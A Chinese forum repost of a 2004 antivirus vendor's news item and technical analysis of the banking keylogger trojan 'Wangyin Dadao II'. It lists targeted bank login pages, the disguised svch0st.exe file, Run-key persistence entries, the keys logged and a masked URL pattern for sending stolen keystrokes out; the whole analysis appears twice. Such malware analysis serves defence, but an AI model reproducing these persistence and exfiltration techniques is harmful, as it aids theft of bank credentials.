- 注册
- 2002-10-12
- 消息
- 47,114
- 荣誉分数
- 2,376
- 声望点数
- 393
昨天,江民快速反病毒中心透露,已于4月份被截获的“网银大盗”又出新变种,变种能突破大部分网上银行安全防线,成功窃取用户账号和密码,网上银行潜在的资金威胁已上升到万亿级别。
昨天,江民病毒专家向记者透露,该病毒是一个Key记录程序,当它检测到用户在网上银行网页上进行支付或转账等操作时,就会记录当前的键盘输入,然后发送到病毒作者的服务器上。病毒运行后,盗取的网上银行涉及:中国工商银行、中国建设银行、交通银行、民生、华夏等银行的网上银行,还包括招商银行、深圳发展银行。
目前,江民公司已经在第一时间升级。用户打开江民杀毒软件的隐私保护,即可全面防杀该病毒,保护个人网上银行账号和密码的安全。
“网银大盗Ⅱ”技术分析报告
病毒名称:网银大盗Ⅱ(Trojan/KeyLog.Dingxa)
病毒类型:木马
病毒大小:16284字节
传播方式:网络
压缩方式:ASpack
2004年6月2日晚,又截获“网银大盗”新变种,该木马盗取几乎涵盖中国目前所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月分截获网银大盗(Trojan/PSW.HidWebmon)有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大,更直接,也给各网上银行造成更大的安全威胁和信任危机。
具体技术特征如下:
1. 病毒运行后,盗取的网上银行涉及:
银联支付网关-->执行支付
银联支付网关:
中国工商银行新一代网上银行
中国工商银行网上银行:
工商银行网上支付:
申请牡丹信用卡
招商银行个人银行
招商银行一网通:
个人网上银行
中国建设银行网上银行
登陆个人网上银行;;
中国建设银行
中国建设银行网上银行:
交通银行网上银行
交通银行网上银行:
深圳发展银行帐户查询系统
深圳发展银行|个人银行
深圳发展银行 | 个人用户申请表
深圳发展银行:
民生网个人普通版
民生银行:
网上银行--个人普通业务
华夏银行:
上海银行企业网上银行
上海银行:
首都电子商城商户管理平台
首都电子商城商户管理:
中国在线支付网: :IPAY网上支付中心
中国在线支付网商户:
招商银行网上支付中心
招商银行网上支付:
个人网上银行-网上支付
2. 病毒算机中创建以下文件:
%SystemDir%\svch0st.exe,16284字节,病毒本身
3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:
“svch0st.exe” = “%SystemDir%\svch0st.exe”
“taskmgr.exe” = “%SystemDir%\svch0st.exe”
4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:
AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
!2@3#4$5%6^7&8*9(0)
{BackSpace}
{Tab}
{回车}
{Shift}
{Ctrl}
{Alt}
{Pause}
{Esc}
{空格}
{End}
{Home}
{Left}
{Right}
{Up}
{Down}
{Insert}
{Delete}
;:=+,<-_.>/?`~][{\|]}'
{Del}
{F1}
{F2}
{F3}
{F4}
{F5}
{F6}
{F7}
{F8}
{F9}
{F10}
{F11}
{F12}
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{PageDown}
5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:
http://*****.com/****/get.asp?txt=××银行:<截获的按键>
6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器。
昨天,江民病毒专家向记者透露,该病毒是一个Key记录程序,当它检测到用户在网上银行网页上进行支付或转账等操作时,就会记录当前的键盘输入,然后发送到病毒作者的服务器上。病毒运行后,盗取的网上银行涉及:中国工商银行、中国建设银行、交通银行、民生、华夏等银行的网上银行,还包括招商银行、深圳发展银行。
目前,江民公司已经在第一时间升级。用户打开江民杀毒软件的隐私保护,即可全面防杀该病毒,保护个人网上银行账号和密码的安全。
“网银大盗Ⅱ”技术分析报告
病毒名称:网银大盗Ⅱ(Trojan/KeyLog.Dingxa)
病毒类型:木马
病毒大小:16284字节
传播方式:网络
压缩方式:ASpack
2004年6月2日晚,又截获“网银大盗”新变种,该木马盗取几乎涵盖中国目前所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月分截获网银大盗(Trojan/PSW.HidWebmon)有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大,更直接,也给各网上银行造成更大的安全威胁和信任危机。
具体技术特征如下:
1. 病毒运行后,盗取的网上银行涉及:
银联支付网关-->执行支付
银联支付网关:
中国工商银行新一代网上银行
中国工商银行网上银行:
工商银行网上支付:
申请牡丹信用卡
招商银行个人银行
招商银行一网通:
个人网上银行
中国建设银行网上银行
登陆个人网上银行;;
中国建设银行
中国建设银行网上银行:
交通银行网上银行
交通银行网上银行:
深圳发展银行帐户查询系统
深圳发展银行|个人银行
深圳发展银行 | 个人用户申请表
深圳发展银行:
民生网个人普通版
民生银行:
网上银行--个人普通业务
华夏银行:
上海银行企业网上银行
上海银行:
首都电子商城商户管理平台
首都电子商城商户管理:
中国在线支付网: :IPAY网上支付中心
中国在线支付网商户:
招商银行网上支付中心
招商银行网上支付:
个人网上银行-网上支付
2. 病毒算机中创建以下文件:
%SystemDir%\svch0st.exe,16284字节,病毒本身
3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:
“svch0st.exe” = “%SystemDir%\svch0st.exe”
“taskmgr.exe” = “%SystemDir%\svch0st.exe”
4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:
AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
!2@3#4$5%6^7&8*9(0)
{BackSpace}
{Tab}
{回车}
{Shift}
{Ctrl}
{Alt}
{Pause}
{Esc}
{空格}
{End}
{Home}
{Left}
{Right}
{Up}
{Down}
{Insert}
{Delete}
;:=+,<-_.>/?`~][{\|]}'
{Del}
{F1}
{F2}
{F3}
{F4}
{F5}
{F6}
{F7}
{F8}
{F9}
{F10}
{F11}
{F12}
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{PageDown}
5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:
http://*****.com/****/get.asp?txt=××银行:<截获的按键>
6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器。
